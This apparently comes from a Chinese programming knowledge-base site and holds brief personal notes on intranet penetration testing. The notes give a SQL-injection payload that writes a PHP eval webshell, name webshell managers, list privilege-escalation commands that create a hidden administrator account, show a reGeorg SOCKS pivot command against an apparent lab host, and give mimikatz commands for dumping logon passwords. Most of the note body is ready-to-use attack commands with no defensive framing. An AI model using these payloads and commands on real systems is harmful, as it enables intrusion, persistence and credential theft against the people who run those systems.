| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> PHP知识库 -> 内网渗透 雾 -> 正文阅读 |
|
[PHP知识库]内网渗透 雾 |
(传参后界面变化,删除传参也不会改变)可能是http变成了https,插件问题 SQL注入可以写webshellinto outfile 导出文件 into dumpfile 导出文件 将查询的结果导出成文件 http://xxx.com/?id=1 union select 1,"<?php eval($_REQUEST[8])?>" into outfile 'C:/phpStudy/WWW/456.php' Webshell管理工具 菜刀、蚁剑 => 一句话木马直接连接(默认流量没有加密) 冰蝎、哥斯拉 => 流量加密,一定要用专属马 github.com 提权当我们遇到不是管理员的权限时,需要提权 1、利用目标主机上的服务提权(目标主机运行着xxx软件,但这个软件有漏洞可以利用) 2、利用web服务(一台机器上可能有多个网站,多个web容器) 3、利用Windows漏洞|Linux漏洞 系统漏洞 systeminfo https://i.hacking8.com/tiquan/ 辅助提权网页 烂土豆 菜刀连接后,烂土豆拖进文件内 444.exe -p "net user as A1B2C3!.Qa /add" 添加用户 444.exe -p "net localgroup administrators as /add" 提升管理员权限 远程桌面只有管理员可以连接 netstat -ano 看端口,开了远程桌面 正向连接? ? ? ? 请求 => PHP => 发送出去(不需要外网) 反向连接? ? ? ? 目标 => 连接攻击者 (需要有外网) 3389咋么连接? PHP作为中间媒介(php可以帮助我们发起请求) reGeorg 可以将我们传输的数据给目标站点,成为沟通的桥梁 python2 reGeorgSocksProxy.py -u http://afsgr16-b1ferw.aqlab.cn/img/123.php -p 5242 监听电脑的5242端口 全局代理 =>需要的是所有流量 =>浏览器的代理 猕猴桃 privilege::debug????????提升权限 sekurlsa::logonpasswords????????抓取密码
|
|
PHP知识库 最新文章 |
Laravel 下实现 Google 2fa 验证 |
UUCTF WP |
DASCTF10月 web |
XAMPP任意命令执行提升权限漏洞(CVE-2020- |
[GYCTF2020]Easyphp |
iwebsec靶场 代码执行关卡通关笔记 |
多个线程同步执行,多个线程依次执行,多个 |
php 没事记录下常用方法 (TP5.1) |
php之jwt |
2021-09-18 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/23 7:13:13- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |